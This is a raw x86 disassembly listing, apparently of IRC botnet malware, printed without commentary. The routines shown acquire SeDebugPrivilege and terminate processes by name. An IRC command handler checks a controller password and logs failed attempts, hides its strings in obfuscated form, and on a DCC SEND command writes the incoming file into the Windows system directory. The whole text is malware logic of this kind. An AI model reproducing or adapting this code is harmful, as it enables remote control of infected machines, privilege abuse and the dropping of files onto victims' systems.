loc_41FEE2: ; CODE XREF: sub_41FE3F+4F�j
; sub_41FE3F+95�j
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_1148]
push 1000h
push eax
call dword_456F30
test eax, eax
jnz short loc_41FF03
xor al, al
jmp loc_420038
; ---------------------------------------------------------------------------
loc_41FF03: ; CODE XREF: sub_41FE3F+BB�j
mov esi, [ebp+var_18]
mov [ebp+var_10], ebx
shr esi, 2
mov [ebp+var_24], esi
mov [ebp+var_C], ebx
jz loc_41FFFD
push edi
loc_41FF19: ; CODE XREF: sub_41FE3F+1B7�j
lea eax, [ebp+var_148]
push offset aUnknown ; "unknown"
push eax
call dword_4370B4 ; lstrcpyA
mov eax, [ebp+var_C]
push [ebp+eax*4+var_1148]
push ebx
push 411h
call dword_437114 ; OpenProcess
mov edi, eax
cmp edi, ebx
jz loc_41FFF0
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_20]
push 4
push eax
push edi
call dword_456EEC
test eax, eax
jz loc_41FFE9
lea eax, [ebp+var_148]
push 104h
push eax
push [ebp+var_20]
push edi
call dword_456E20
lea eax, [ebp+var_148]
mov [ebp+var_14], ebx
push eax
call sub_4293A0
test eax, eax
pop ecx
jbe short loc_41FFBC
mov eax, [ebp+var_C]
lea esi, [ebp+eax+var_148]
loc_41FF98: ; CODE XREF: sub_41FE3F+178�j
movsx eax, byte ptr [esi]
push eax
call sub_42C278
inc [ebp+var_14]
mov [esi], al
lea eax, [ebp+var_148]
push eax
call sub_4293A0
cmp [ebp+var_14], eax
pop ecx
pop ecx
jb short loc_41FF98
mov esi, [ebp+var_24]
loc_41FFBC: ; CODE XREF: sub_41FE3F+14D�j
cmp [ebp+arg_0], ebx
jnz short loc_41FFC6
mov [ebp+var_1], bl
jmp short loc_41FFE9
; ---------------------------------------------------------------------------
loc_41FFC6: ; CODE XREF: sub_41FE3F+180�j
push [ebp+arg_0]
lea eax, [ebp+var_148]
push eax
call dword_437178 ; lstrcmpiA
test eax, eax
jnz short loc_41FFE9
inc [ebp+var_10]
push ebx
push edi
call dword_437118 ; TerminateProcess
mov [ebp+var_1], 1
loc_41FFE9: ; CODE XREF: sub_41FE3F+11F�j
; sub_41FE3F+185�j ...
push edi
call dword_437044 ; CloseHandle
loc_41FFF0: ; CODE XREF: sub_41FE3F+106�j
inc [ebp+var_C]
cmp [ebp+var_C], esi
jb loc_41FF19
pop edi
loc_41FFFD: ; CODE XREF: sub_41FE3F+D3�j
cmp [ebp+arg_4], ebx
jz short loc_420015
push [ebp+var_10]
push offset dword_44772C
push [ebp+arg_4]
call sub_429B03
add esp, 0Ch
loc_420015: ; CODE XREF: sub_41FE3F+1C1�j
cmp [ebp+var_8], ebx
jz short loc_420035
push ebx
push ebx
lea eax, [ebp+var_44]
push 10h
push eax
push ebx
push [ebp+var_8]
call dword_456FB4 ; AdjustTokenPrivileges
push [ebp+var_8]
call dword_437044 ; CloseHandle
loc_420035: ; CODE XREF: sub_41FE3F+1D9�j
mov al, [ebp+var_1]
loc_420038: ; CODE XREF: sub_41FE3F+BF�j
pop esi
pop ebx
leave
retn
sub_41FE3F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42003C proc near ; CODE XREF: sub_420105+12�p
var_18 = dword ptr -18h
var_14 = byte ptr -14h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 18h
push ebx
push esi
mov esi, [ebp+arg_0]
push edi
xor edi, edi
push esi
push edi
push 28h
loc_42004E: ; DATA XREF: .text:0043BAB8�o
; .text:0043BAC4�o ...
mov [ebp+var_8], 10h
mov [ebp+var_4], edi
call dword_437124 ; GetCurrentThread
push eax
call dword_456E48 ; OpenThreadToken
test eax, eax
jnz short loc_42007F
push esi
push 28h
call dword_43704C ; GetCurrentProcess
push eax
call dword_456F18 ; OpenProcessToken
test eax, eax
jnz short loc_42007F
mov [esi], edi
loc_42007F: ; CODE XREF: sub_42003C+2B�j
; sub_42003C+3F�j
cmp [esi], edi
jz short loc_4200D6
lea eax, [ebp+var_14]
xor ebx, ebx
push eax
inc ebx
push offset aSedebugprivile ; "SeDebugPrivilege"
push edi
mov [ebp+var_18], ebx
mov [ebp+var_C], 2
call dword_456EDC ; LookupPrivilegeValueA
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_18]
push [ebp+arg_4]
push 10h
push eax
push edi
push dword ptr [esi]
call dword_456FB4 ; AdjustTokenPrivileges
test eax, eax
jz short loc_4200CC
call dword_437170 ; RtlGetLastWin32Error
cmp eax, 514h
jz short loc_4200CC
mov [ebp+var_4], ebx
jmp short loc_4200D6
; ---------------------------------------------------------------------------
loc_4200CC: ; CODE XREF: sub_42003C+7C�j
; sub_42003C+89�j
push dword ptr [esi]
call dword_437044 ; CloseHandle
mov [esi], edi
loc_4200D6: ; CODE XREF: sub_42003C+45�j
; sub_42003C+8E�j
mov eax, [ebp+var_4]
pop edi
pop esi
pop ebx
leave
retn
sub_42003C endp
; =============== S U B R O U T I N E =======================================
sub_4200DE proc near ; CODE XREF: sub_420105+47�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, [esp+4+arg_0]
xor ecx, ecx
mov eax, [esi]
cmp eax, ecx
jz short loc_420103
push ecx
push ecx
push 10h
push [esp+10h+arg_4]
push ecx
push eax
call dword_456FB4 ; AdjustTokenPrivileges
push dword ptr [esi]
call dword_437044 ; CloseHandle
loc_420103: ; CODE XREF: sub_4200DE+B�j
pop esi
retn
sub_4200DE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_420105 proc near ; CODE XREF: sub_41F876+241�p
; sub_41F876+31B�p ...
var_14 = byte ptr -14h
var_4 = byte ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 14h
push ebx
lea eax, [ebp+var_14]
push esi
push eax
lea eax, [ebp+var_4]
xor ebx, ebx
push eax
call sub_42003C
pop ecx
pop ecx
push [ebp+arg_0]
push ebx
push 411h
call dword_437114 ; OpenProcess
mov esi, eax
cmp esi, ebx
jz short loc_420144
push ebx
push esi
call dword_437118 ; TerminateProcess
push esi
mov bl, 1
call dword_437044 ; CloseHandle
loc_420144: ; CODE XREF: sub_420105+2C�j
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_4]
push eax
call sub_4200DE
pop ecx
pop ecx
pop esi
movzx eax, bl
pop ebx
leave
retn
sub_420105 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42015A proc near ; CODE XREF: sub_41F876+2C3�p
var_1114 = byte ptr -1114h
var_114 = dword ptr -114h
var_110 = dword ptr -110h
var_10C = byte ptr -10Ch
var_10 = byte ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 1114h
call sub_429B60
push ebx
push esi
lea eax, [ebp+var_C]
push edi
push eax
lea eax, [ebp+var_1114]
push 1000h
push eax
call dword_456F30
test eax, eax
jz loc_420240
mov eax, dword_4473F8
mov ebx, [ebp+var_C]
push 3Fh
mov [ebp+var_114], eax
mov eax, dword_4473FC
pop ecx
mov [ebp+var_110], eax
push offset a??? ; "???"
push [ebp+arg_4]
xor eax, eax
lea edi, [ebp+var_10C]
rep stosd
shr ebx, 2
call dword_4370B4 ; lstrcpyA
xor edi, edi
test ebx, ebx
jbe short loc_42023D
loc_4201C5: ; CODE XREF: sub_42015A+B0�j
lea esi, [ebp+edi*4+var_1114]
push dword ptr [esi]
push 0
push 410h
call dword_437114 ; OpenProcess
test eax, eax
mov [ebp+var_4], eax
jz short loc_420207
lea ecx, [ebp+var_10]
push ecx
lea ecx, [ebp+var_8]
push 4
push ecx
push eax
call dword_456EEC
test eax, eax
jz short loc_4201FE
mov eax, [ebp+arg_0]
cmp eax, [esi]
jz short loc_42020E
loc_4201FE: ; CODE XREF: sub_42015A+9B�j
push [ebp+var_4]
call dword_437044 ; CloseHandle
loc_420207: ; CODE XREF: sub_42015A+86�j
inc edi
cmp edi, ebx
jb short loc_4201C5
jmp short loc_42023D
; ---------------------------------------------------------------------------
loc_42020E: ; CODE XREF: sub_42015A+A2�j
lea eax, [ebp+var_114]
push 104h
push eax
push [ebp+var_8]
push [ebp+var_4]
call dword_456EE4
lea eax, [ebp+var_114]
push eax
push offset aS_5 ; "%s"
push [ebp+arg_4]
call sub_429B03
add esp, 0Ch
loc_42023D: ; CODE XREF: sub_42015A+69�j
; sub_42015A+B2�j
mov eax, [ebp+arg_4]
loc_420240: ; CODE XREF: sub_42015A+28�j
pop edi
pop esi
pop ebx
leave
retn
sub_42015A endp
; =============== S U B R O U T I N E =======================================
sub_420245 proc near ; CODE XREF: sub_41F876+1C0�p
; .text:0043664F�j
var_4 = byte ptr -4
push ecx
push esi
mov esi, ecx
mov eax, [esi+4]
push eax
mov ecx, [eax]
lea eax, [esp+0Ch+var_4]
push ecx
push eax
mov ecx, esi
call sub_4202AB
push dword ptr [esi+4]
call sub_4290D0
and dword ptr [esi+4], 0
and dword ptr [esi+8], 0
pop ecx
pop esi
pop ecx
retn
sub_420245 endp
; =============== S U B R O U T I N E =======================================
sub_420270 proc near ; CODE XREF: sub_41FC58+1C5�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push ebx
push esi
mov esi, [esp+8+arg_4]
push edi
mov ebx, ecx
push dword ptr [esi+4]
push esi
call sub_4202E3
mov [esi+4], eax
mov ecx, [eax+4]
lea edi, [eax+8]
test edi, edi
mov [ecx], eax
jz short loc_42029A
mov esi, [esp+0Ch+arg_8]
push 61h
pop ecx
rep movsd
loc_42029A: ; CODE XREF: sub_420270+1F�j
mov ecx, [esp+0Ch+arg_0]
inc dword ptr [ebx+8]
pop edi
pop esi
mov [ecx], eax
mov eax, ecx
pop ebx
retn 0Ch
sub_420270 endp
; =============== S U B R O U T I N E =======================================
sub_4202AB proc near ; CODE XREF: sub_420245+12�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
mov esi, [esp+4+arg_4]
push edi
mov edi, ecx
jmp short loc_4202D2
; ---------------------------------------------------------------------------
loc_4202B5: ; CODE XREF: sub_4202AB+2B�j
mov eax, esi
mov esi, [esi]
push eax
mov ecx, [eax+4]
mov edx, [eax]
mov [ecx], edx
mov ecx, [eax]
mov edx, [eax+4]
mov [ecx+4], edx
call sub_4290D0
dec dword ptr [edi+8]
pop ecx
loc_4202D2: ; CODE XREF: sub_4202AB+8�j
cmp esi, [esp+8+arg_8]
jnz short loc_4202B5
mov eax, [esp+8+arg_0]
pop edi
mov [eax], esi
pop esi
retn 0Ch
sub_4202AB endp
; =============== S U B R O U T I N E =======================================
sub_4202E3 proc near ; CODE XREF: sub_41F876+4F�p
; sub_420270+D�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push 18Ch
call sub_42B4D7
pop ecx
mov ecx, [esp+arg_0]
test ecx, ecx
jnz short loc_4202F8
mov ecx, eax
loc_4202F8: ; CODE XREF: sub_4202E3+11�j
mov [eax], ecx
mov ecx, [esp+arg_4]
test ecx, ecx
jnz short loc_420304
mov ecx, eax
loc_420304: ; CODE XREF: sub_4202E3+1D�j
mov [eax+4], ecx
retn 8
sub_4202E3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42030A proc near ; CODE XREF: sub_40A935+5D�p
; sub_42045F+82�p
var_154 = byte ptr -154h
var_10C = byte ptr -10Ch
var_106 = byte ptr -106h
var_105 = byte ptr -105h
var_102 = byte ptr -102h
var_101 = byte ptr -101h
var_FD = byte ptr -0FDh
var_F3 = byte ptr -0F3h
var_F2 = byte ptr -0F2h
var_F1 = byte ptr -0F1h
var_EF = byte ptr -0EFh
var_EE = byte ptr -0EEh
var_EC = byte ptr -0ECh
var_E6 = byte ptr -0E6h
var_E5 = byte ptr -0E5h
var_E2 = byte ptr -0E2h
var_E1 = byte ptr -0E1h
var_DE = byte ptr -0DEh
var_DD = byte ptr -0DDh
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = byte ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 154h
push ebx
push esi
push edi
xor ebx, ebx
push 100h
lea eax, [ebp+var_154]
push ebx
push eax
call sub_429760
mov esi, [ebp+arg_8]
add esp, 0Ch
cmp esi, ebx
jl short loc_420393
loc_420334: ; CODE XREF: sub_42030A+87�j
mov eax, [ebp+arg_4]
lea ecx, [eax+esi*4]
mov eax, [ecx]
cmp eax, ebx
jz short loc_420390
mov dl, [eax]
cmp dl, 2Dh
jnz short loc_420393
cmp [eax+2], bl
jnz short loc_42035A
movsx edx, byte ptr [eax+1]
mov [ebp+edx+var_154], 1
jmp short loc_420382
; ---------------------------------------------------------------------------
loc_42035A: ; CODE XREF: sub_42030A+40�j
cmp dl, 2Dh
jnz short loc_420393
cmp byte ptr [eax+2], 3Ah
jnz short loc_420393
cmp [eax+4], bl
jnz short loc_420393
movsx edx, byte ptr [eax+1]
mov [ebp+edx+var_154], 1
cmp byte ptr [eax+1], 72h
jnz short loc_420382
mov dl, [eax+3]
mov [ebp+var_30], dl
loc_420382: ; CODE XREF: sub_42030A+4E�j
; sub_42030A+70�j
mov [eax], bl
mov eax, [ecx]
mov [eax+1], bl
mov eax, [ecx]
mov [eax+2], bl
mov [ecx], ebx
loc_420390: ; CODE XREF: sub_42030A+34�j
dec esi
jns short loc_420334
loc_420393: ; CODE XREF: sub_42030A+28�j
; sub_42030A+3B�j ...
movzx eax, [ebp+var_E1]
mov [ebp+var_54], eax
push 15h
movzx eax, [ebp+var_E6]
mov [ebp+var_50], eax
lea esi, [ebp+var_54]
movzx eax, [ebp+var_EC]
mov [ebp+var_4C], eax
movzx eax, [ebp+var_DE]
movzx ecx, [ebp+var_EE]
mov [ebp+var_48], eax
mov [ebp+var_40], ecx
movzx eax, [ebp+var_101]
movzx ecx, [ebp+var_E5]
movzx edx, [ebp+var_105]
mov [ebp+var_44], eax
mov [ebp+var_24], eax
movzx eax, [ebp+var_F3]
mov [ebp+var_14], eax
mov [ebp+var_3C], ecx
movzx eax, [ebp+var_F2]
movzx ecx, [ebp+var_DD]
mov [ebp+var_28], edx
mov [ebp+var_10], eax
movzx edx, [ebp+var_10C]
movzx eax, [ebp+var_F1]
mov [ebp+var_38], ecx
mov [ebp+var_20], edx
movzx ecx, [ebp+var_FD]
movzx edx, [ebp+var_106]
mov [ebp+var_C], eax
mov [ebp+var_2C], ecx
movzx eax, [ebp+var_EF]
movzx ecx, [ebp+var_E2]
mov [ebp+var_18], edx
mov [ebp+var_4], eax
movzx edx, [ebp+var_102]
mov eax, [ebp+arg_0]
mov [ebp+var_34], ecx
mov [ebp+var_8], ecx
pop ecx
mov edi, eax
mov [ebp+var_1C], edx
rep movsd
pop edi
pop esi
pop ebx
leave
retn
sub_42030A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42045F proc near ; DATA XREF: sub_420D91+18�o
var_3D70 = byte ptr -3D70h
var_1660 = byte ptr -1660h
var_660 = byte ptr -660h
var_260 = byte ptr -260h
var_25C = byte ptr -25Ch
var_15C = dword ptr -15Ch
var_158 = dword ptr -158h
var_154 = dword ptr -154h
var_150 = dword ptr -150h
var_14C = dword ptr -14Ch
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, 3D70h
call sub_429B60
push ebx
push esi
mov esi, [ebp+arg_0]
push edi
inc esi
cmp byte ptr [esi+1], 0
jz loc_420AB0
cmp byte ptr [esi], 2Bh
jnz short loc_4204A0
push offset byte_454A54
push offset asc_44DE08 ; "+"
push esi
call sub_4279FA
push esi
push offset dword_443EB0
call sub_415641
add esp, 14h
loc_4204A0: ; CODE XREF: sub_42045F+21�j
lea eax, [ebp+var_660]
push esi
push eax
call dword_4370B4 ; lstrcpyA
push 40h
lea eax, [ebp+var_15C]
push esi
push eax
call sub_42777F
mov cl, [ebp+var_660]
add esp, 0Ch
cmp cl, byte_4439A0
mov [ebp+arg_0], eax
jnz loc_420733
push eax
lea eax, [ebp+var_15C]
push eax
lea eax, [ebp+var_5C]
push eax
call sub_42030A
add esp, 0Ch
cmp [ebp+var_15C], 0
mov esi, eax
lea edi, [ebp+var_5C]
push 15h
pop ecx
rep movsd
jz loc_420AB0
mov eax, [ebp+var_15C]
mov al, [eax]
cmp al, byte_4439A0
jnz short loc_420575
mov ebx, [ebp+arg_4]
mov edi, [ebp+arg_8]
inc [ebp+var_15C]
mov ecx, edi
push dword ptr [ebx+8]
push dword ptr [ebx+4]
push dword ptr [ebx]
call sub_41C755
test eax, eax
mov ecx, edi
jz short loc_42057C
call sub_41DB58
push eax
push dword ptr [ebx+0Ch]
call dword_437178 ; lstrcmpiA
test eax, eax
jnz short loc_420549
mov eax, [ebx]
mov [ebx+0Ch], eax
loc_420549: ; CODE XREF: sub_42045F+E3�j
push 0
lea eax, [ebp+var_660]
sub esp, 54h
lea esi, [ebp+var_5C]
push 15h
pop ecx
mov edi, esp
push [ebp+arg_8]
rep movsd
push ebx
push eax
push [ebp+arg_0]
lea eax, [ebp+var_15C]
push eax
call sub_40A9FE
add esp, 6Ch
loc_420575: ; CODE XREF: sub_42045F+AF�j
; sub_42045F+18B�j ...
xor eax, eax
loc_420577: ; CODE XREF: sub_42045F+654�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_42057C: ; CODE XREF: sub_42045F+D0�j
call sub_41DB58
mov esi, dword_437178
push eax
push dword ptr [ebx+0Ch]
call esi ; dword_437178
test eax, eax
jnz short loc_4205DB
mov ecx, edi
call sub_41C7A8
test eax, eax
lea eax, [ebp+var_660]
push eax
push dword ptr [ebx+8]
push dword ptr [ebx+4]
push dword ptr [ebx]
push offset aShktk1eNl8Jlzt ; "sHKtk1e/Nl8/jLZte1JtI/t1"
push offset aXiw8_1hhx7d1 ; "Xiw8.1HHX7d1"
push offset aSSSS@SSentPmS ; "%s %s %s!%s@%s (Sent PM -> \"%s\")"
loc_4205B8: ; CODE XREF: sub_42045F+217�j
jz short loc_4205C8
push edi
call sub_41C844
add esp, 20h
jmp loc_420AB0
; ---------------------------------------------------------------------------
loc_4205C8: ; CODE XREF: sub_42045F:loc_4205B8�j
push offset dword_443F34
push edi
call sub_41CE4A
add esp, 24h
jmp loc_420AB0
; ---------------------------------------------------------------------------
loc_4205DB: ; CODE XREF: sub_42045F+130�j
push [ebp+var_15C]
push offset aDehziSaO0 ; "deHZI/SA//o0"
call esi ; dword_437178
test eax, eax
jnz short loc_420575
cmp [ebp+var_158], eax
jz loc_420AB0
push dword ptr [ebx+8]
lea eax, [ebp+var_25C]
push dword ptr [ebx+4]
push dword ptr [ebx]
push offset aSS@S ; "%s!%s@%s"
push 100h
push eax
call sub_429BBE
and [ebp+arg_4], 0
add esp, 18h
cmp dword_445D24, 0
jle short loc_420650
loc_420626: ; CODE XREF: sub_42045F+1EF�j
lea eax, [ebp+var_25C]
push eax
mov eax, [ebp+arg_4]
push off_443F00[eax*4]
call sub_427B4E
pop ecx
test eax, eax
pop ecx
jnz short loc_42067B
inc [ebp+arg_4]
mov eax, [ebp+arg_4]
cmp eax, dword_445D24
jl short loc_420626
loc_420650: ; CODE XREF: sub_42045F+1C5�j
; sub_42045F+232�j
mov ecx, edi
call sub_41C7A8
push [ebp+var_158]
test eax, eax
push dword ptr [ebx+8]
push dword ptr [ebx+4]
push dword ptr [ebx]
push offset aZcm1__num3n0oe ; "ZcM1..nUM3N0OE819.1TEYD."
push offset aXiw8_1hhx7d1 ; "Xiw8.1HHX7d1"
push offset aSSSS@SPassTrie ; "%s %s [%s!%s@%s] (Pass Tried -> %s)"
jmp loc_4205B8
; ---------------------------------------------------------------------------
loc_42067B: ; CODE XREF: sub_42045F+1E1�j
push [ebp+var_158]
call sub_4155AA
pop ecx
push eax
push offset dword_443E68
call esi ; dword_437178
test eax, eax
jnz short loc_420650
push dword ptr [ebx+8]
mov ecx, edi
push dword ptr [ebx+4]
push dword ptr [ebx]
call sub_41C600
cmp eax, 0FFFFFFFFh
mov esi, offset aSS_1 ; "%s %s"
mov edi, offset aTy2nt0oi2yk ; "ty2nT0oI2YK/"
jnz short loc_4206EF
cmp [ebp+var_5C], 0
jnz short loc_4206D2
cmp [ebp+var_58], 0
jnz short loc_4206DC
push offset aMkk0_mvscp_hwh ; "mKK0/.MVScP.hwHKV/Er1cB0ZvOBu/66U/i/nNp"...
push edi
push esi
push dword ptr [ebx+0Ch]
push [ebp+arg_8]
call sub_41CE4A
add esp, 14h
loc_4206D2: ; CODE XREF: sub_42045F+256�j
cmp [ebp+var_58], 0
jz loc_420AB0
loc_4206DC: ; CODE XREF: sub_42045F+25C�j
push offset aMkk0_mvscp_hwh ; "mKK0/.MVScP.hwHKV/Er1cB0ZvOBu/66U/i/nNp"...
push edi
push esi
push dword ptr [ebx]
push [ebp+arg_8]
call sub_41CE4A
jmp short loc_42072B
; ---------------------------------------------------------------------------
loc_4206EF: ; CODE XREF: sub_42045F+250�j
cmp [ebp+var_5C], 0
jnz short loc_420710
cmp [ebp+var_58], 0
jnz short loc_42071A
push offset aQvp40nd9f2 ; "/qvP40nD9F2/"
push edi
push esi
push dword ptr [ebx+0Ch]
push [ebp+arg_8]
call sub_41CE4A
add esp, 14h
loc_420710: ; CODE XREF: sub_42045F+294�j
cmp [ebp+var_58], 0
jz loc_420AB0
loc_42071A: ; CODE XREF: sub_42045F+29A�j
push offset aQvp40nd9f2 ; "/qvP40nD9F2/"
push edi
push esi
push dword ptr [ebx]
push [ebp+arg_8]
call sub_41CDD4
loc_42072B: ; CODE XREF: sub_42045F+28E�j
add esp, 14h
jmp loc_420AB0
; ---------------------------------------------------------------------------
loc_420733: ; CODE XREF: sub_42045F+70�j
mov edi, [ebp+arg_8]
mov ecx, edi
call sub_41DB58
mov esi, [ebp+arg_4]
mov ebx, dword_437178
push eax
push dword ptr [esi+0Ch]
call ebx ; dword_437178
test eax, eax
jnz loc_420AB0
push [ebp+var_15C]
push offset dword_44DDA8
call ebx ; dword_437178
test eax, eax
jnz short loc_4207AF
push offset dword_4439BC
push offset dword_44DD98
push dword ptr [esi]
push edi
call sub_41CDD4
add esp, 10h
mov ecx, edi
push dword ptr [esi+8]
push dword ptr [esi+4]
push dword ptr [esi]
call sub_41C755
test eax, eax
jnz loc_420AB0
mov ecx, edi
call sub_41C7A8
push dword ptr [esi+8]
push dword ptr [esi+4]
push dword ptr [esi]
push offset aXiw8_1hhx7d1 ; "Xiw8.1HHX7d1"
push offset aSVersionReques ; "%s Version request from: %s!%s@%s"
jmp loc_420A93
; ---------------------------------------------------------------------------
loc_4207AF: ; CODE XREF: sub_42045F+304�j
push [ebp+var_15C]
push offset dword_44DD6C
call ebx ; dword_437178
test eax, eax
jnz loc_420A30
push dword ptr [esi+8]
mov ecx, edi
push dword ptr [esi+4]
push dword ptr [esi]
call sub_41C755
test eax, eax
jnz short loc_4207F5
mov ecx, edi
call sub_41C7A8
push dword ptr [esi+8]
push dword ptr [esi+4]
push dword ptr [esi]
push offset aXiw8_1hhx7d1 ; "Xiw8.1HHX7d1"
push offset aSDccRequestFro ; "%s DCC request from: %s!%s@%s"
jmp loc_420A93
; ---------------------------------------------------------------------------
loc_4207F5: ; CODE XREF: sub_42045F+376�j
push [ebp+var_158]
push offset aSend_0 ; "SEND"
call ebx ; dword_437178
test eax, eax
jnz loc_420A30
and [ebp+arg_0], eax
lea eax, [ebp+var_260]
push 104h
push eax
call dword_4370F4 ; GetSystemDirectoryA
push [ebp+var_154]
lea eax, [ebp+var_260]
push eax
lea eax, [ebp+var_260]
push offset dword_445D68
push eax
call sub_429B03
add esp, 10h
lea eax, [ebp+var_260]
push 0
push 80h
push 2
push 0
push 1
push 40000000h
push eax
call dword_43705C ; CreateFileA
cmp eax, 0FFFFFFFFh
jnz short loc_420875
push offset aYdidb16dnmq_ ; "YdidB16dnMQ."
push offset aRccsh_adukf1 ; "RcCSh.AdUKf1"
push offset aSSUnableToWrit ; "%s %s unable to write file to disk."
jmp short loc_4208A5
; ---------------------------------------------------------------------------
loc_420875: ; CODE XREF: sub_42045F+403�j
push eax
call dword_437044 ; CloseHandle
lea eax, [ebp+var_260]
push offset off_44DD1C
push eax
call sub_42A50C
pop ecx
mov [ebp+var_4], eax
test eax, eax
pop ecx
jnz short loc_4208B9
push offset aYdidb16dnmq_ ; "YdidB16dnMQ."
push offset aRccsh_adukf1 ; "RcCSh.AdUKf1"
push offset aSSOpeningFileF ; "%s %s opening file for writing."
loc_4208A5: ; CODE XREF: sub_42045F+414�j
lea eax, [ebp+var_3D70]
push eax
call sub_429B03
add esp, 10h
jmp loc_4209F8
; ---------------------------------------------------------------------------
loc_4208B9: ; CODE XREF: sub_42045F+435�j
push [ebp+var_14C]
call sub_42A100
push eax
push [ebp+var_150]
call sub_42629D
add esp, 0Ch
cmp eax, 0FFFFFFFFh
mov [ebp+arg_4], eax
jnz short loc_420905
call dword_437170 ; RtlGetLastWin32Error
push eax
push offset aVv3aj1ywfkc_xz ; "VV3AJ1ywFkC.XzinP/s/R0A."
push offset aRccsh_adukf1 ; "RcCSh.AdUKf1"
lea eax, [ebp+var_3D70]
push offset aSSD ; "%s %s <%d>"
push eax
call sub_429B03
add esp, 14h
jmp loc_4209F8
; ---------------------------------------------------------------------------
loc_420905: ; CODE XREF: sub_42045F+47A�j
mov edi, 1000h
loc_42090A: ; CODE XREF: sub_42045F+55E�j
push edi
lea eax, [ebp+var_1660]
push 0
push eax
call sub_429760
add esp, 0Ch
lea eax, [ebp+var_1660]
push 0
push edi
push eax
push [ebp+arg_4]
call dword_456F58 ; recv
mov ebx, eax
test ebx, ebx
jz loc_4209C2
cmp ebx, 0FFFFFFFFh
jnz short loc_420988
call dword_437170 ; RtlGetLastWin32Error
push eax
push offset aVv3aj1ywfkc_xz ; "VV3AJ1ywFkC.XzinP/s/R0A."
push offset aRccsh_adukf1 ; "RcCSh.AdUKf1"
lea eax, [ebp+var_3D70]
push offset aSSD ; "%s %s <%d>"
push eax
call sub_429B03
lea eax, [ebp+var_3D70]
push eax
push offset aS_5 ; "%s"
push [ebp+arg_8]
call sub_41C844
push [ebp+var_4]
call sub_42A10B
add esp, 24h
push [ebp+arg_4]
call dword_456FF0 ; closesocket
loc_420988: ; CODE XREF: sub_42045F+4DD�j
push [ebp+var_4]
lea eax, [ebp+var_1660]
push ebx
push 1
push eax
call sub_42C3B3
add [ebp+arg_0], ebx
add esp, 10h
push [ebp+arg_0]
call dword_456F34 ; ntohl
mov [ebp+var_8], eax
push 0
lea eax, [ebp+var_8]
push 4
push eax
push [ebp+arg_4]
call dword_456F8C ; send
jmp loc_42090A
; ---------------------------------------------------------------------------
loc_4209C2: ; CODE XREF: sub_42045F+4D4�j
mov eax, [ebp+arg_0]
cdq
push edx
push eax
call sub_427E4F
push eax
lea eax, [ebp+var_260]
push eax
lea eax, [ebp+var_3D70]
push [ebp+var_150]
push offset aTransferComple ; "Transfer complete from IP: %s, File: %s"...
push eax
call sub_429B03
mov edi, [ebp+arg_8]
mov ebx, dword_437178
add esp, 1Ch
loc_4209F8: ; CODE XREF: sub_42045F+455�j
; sub_42045F+4A1�j
lea eax, [ebp+var_3D70]
push eax
push offset aRccsh_adukf1 ; "RcCSh.AdUKf1"
push offset aSS_1 ; "%s %s"
push edi
call sub_41C844
add esp, 10h
cmp [ebp+var_4], 0
jz short loc_420A21
push [ebp+var_4]
call sub_42A10B
pop ecx
loc_420A21: ; CODE XREF: sub_42045F+5B7�j
cmp [ebp+arg_4], 0
jbe short loc_420A30
push [ebp+arg_4]
call dword_456FF0 ; closesocket
loc_420A30: ; CODE XREF: sub_42045F+35F�j
; sub_42045F+3A5�j ...
push [ebp+var_15C]
push offset dword_44DCC0
call ebx ; dword_437178
test eax, eax
jnz loc_420575
cmp [ebp+var_158], eax
jz loc_420575
push [ebp+var_158]
push offset dword_44DCB4
push dword ptr [esi]
push edi
call sub_41CDD4
add esp, 10h
mov ecx, edi
push dword ptr [esi+8]
push dword ptr [esi+4]
push dword ptr [esi]
call sub_41C755
test eax, eax
jnz short loc_420AB0
mov ecx, edi
call sub_41C7A8
push dword ptr [esi+8]
push dword ptr [esi+4]
push dword ptr [esi]
push offset aXiw8_1hhx7d1 ; "Xiw8.1HHX7d1"
push offset aSPingRequestFr ; "%s Ping request from: %s!%s@%s"
loc_420A93: ; CODE XREF: sub_42045F+34B�j
; sub_42045F+391�j
test eax, eax
jz short loc_420AA2
push edi
call sub_41C844
add esp, 18h
jmp short loc_420AB0
; ---------------------------------------------------------------------------
loc_420AA2: ; CODE XREF: sub_42045F+636�j
push offset dword_443F34
push edi
call sub_41CE4A
add esp, 1Ch
loc_420AB0: ; CODE XREF: sub_42045F+18�j
; sub_42045F+9B�j ...
